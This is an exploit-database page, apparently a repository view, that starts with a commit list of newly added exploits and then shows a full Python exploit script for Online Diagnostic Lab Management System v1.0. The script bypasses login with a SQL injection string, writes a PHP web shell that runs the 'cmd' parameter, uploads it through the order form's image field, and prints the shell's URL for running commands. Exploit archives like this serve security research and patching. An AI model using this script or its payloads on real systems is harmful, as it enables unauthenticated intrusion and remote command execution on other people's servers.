79023d1f9c
22 changes to exploits/shellcodes/ghdb Password Manager for IIS v2.0 - XSS DLink DIR 819 A1 - Denial of Service D-Link DNR-322L <=2.60B15 - Authenticated Remote Code Execution Abantecart v1.3.2 - Authenticated Remote Code Execution Bus Pass Management System 1.0 - Cross-Site Scripting (XSS) Composr-CMS Version <=10.0.39 - Authenticated Remote Code Execution Employee Performance Evaluation System v1.0 - File Inclusion and RCE GuppY CMS v6.00.10 - Remote Code Execution Human Resources Management System v1.0 - Multiple SQLi ImpressCMS v1.4.3 - Authenticated SQL Injection Lavalite v9.0.0 - XSRF-TOKEN cookie File path traversal MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated) PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection Yoga Class Registration System v1.0 - Multiple SQLi NVFLARE < 2.1.4 - Unsafe Deserialization due to Pickle _camp_ Raspberry Pi camera server 1.0 - Authentication Bypass System Mechanic v15.5.0.61 - Arbitrary Read/Write
80 lines
No EOL
2.7 KiB
Text
80 lines
No EOL
2.7 KiB
Text
# Exploit Title: Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated)
|
|
# Google Dork: N/A
|
|
# Date: 2022-9-23
|
|
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html
|
|
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/diagnostic_0.zip
|
|
# Tested on: windows 11 - XAMPP
|
|
# Version: 1.0
|
|
# Authentication Required: bypass login with sql injection
|
|
|
|
#/usr/bin/python3
|
|
|
|
import requests
|
|
import os
|
|
import sys
|
|
import time
|
|
import random
|
|
|
|
# clean screen
|
|
os.system("cls")
|
|
os.system("clear")
|
|
|
|
logo = '''
|
|
##################################################################
|
|
# #
|
|
# Exploit Script ( Online Diagnostic Lab Management System ) #
|
|
# #
|
|
##################################################################
|
|
'''
|
|
print(logo)
|
|
|
|
url = str(input("Enter website url : "))
|
|
username = ("' OR 1=1-- -")
|
|
password = ("test")
|
|
|
|
req = requests.Session()
|
|
|
|
target = url+"/diagnostic/login.php"
|
|
data = {'username':username,'password':password}
|
|
|
|
website = req.post(target,data=data)
|
|
files = open("rev.php","w")
|
|
payload = "<?php system($_GET['cmd']);?>"
|
|
files.write(payload)
|
|
files.close()
|
|
|
|
hash = random.getrandbits(128)
|
|
name_file = str(hash)+".php"
|
|
if "Login Successfully" in website.text:
|
|
|
|
print("[+] Login Successfully")
|
|
website_1 = url+"/diagnostic/php_action/createOrder.php"
|
|
|
|
upload_file = {
|
|
"orderDate": (None,""),
|
|
"clientName": (None,""),
|
|
"clientContact" : (None,""),
|
|
"productName[]" : (None,""),
|
|
"rateValue[]" : (None,""),
|
|
"quantity[]" : (None,""),
|
|
"totalValue[]" : (None,""),
|
|
"subTotalValue" : (None,""),
|
|
"totalAmountValue" : (None,""),
|
|
"discount" : (None,""),
|
|
"grandTotalValue" : (None,""),
|
|
"gstn" : (None,""),
|
|
"vatValue" : (None,""),
|
|
"paid" : (None,""),
|
|
"dueValue" : (None,""),
|
|
"paymentType" : (None,""),
|
|
"paymentStatus" : (None,""),
|
|
"paymentPlace" : (None,""),
|
|
"productImage" : (name_file,open("rev.php","rb"))
|
|
}
|
|
|
|
up = req.post(website_1,files=upload_file)
|
|
print("[+] Check here file shell => "+url+"/diagnostic/assets/myimages/"+name_file)
|
|
print("[+] can exect command here => "+url+"/diagnostic/assets/myimages/"+name_file+"?cmd=whoami")
|
|
else:
|
|
print("[-] Check username or password") |